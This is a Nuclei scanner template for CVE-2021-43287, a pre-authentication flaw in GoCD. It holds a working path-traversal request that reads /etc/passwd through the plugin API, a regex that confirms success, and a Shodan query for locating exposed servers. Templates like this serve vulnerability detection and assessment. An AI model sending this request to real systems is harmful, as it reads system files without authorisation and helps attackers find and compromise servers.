nuclei-templates/cves/2021/CVE-2021-43287.yaml

29 lines
769 B
YAML
Raw Normal View History

2021-11-06 07:04:04 +00:00
id: CVE-2021-43287
2021-11-04 20:00:11 +00:00
info:
2021-11-06 07:04:04 +00:00
name: Pre-Auth Takeover of Build Pipelines in GoCD
2021-11-04 20:00:11 +00:00
author: dhiyaneshDk
severity: critical
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
2021-11-06 07:04:04 +00:00
tags: cve,cve2021,go,lfi,gocd
metadata:
2021-11-04 21:26:16 +00:00
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
2021-11-04 20:00:11 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-11-06 07:04:04 +00:00
2021-11-04 20:00:11 +00:00
- type: regex
regex:
- "root:.*:0:0:"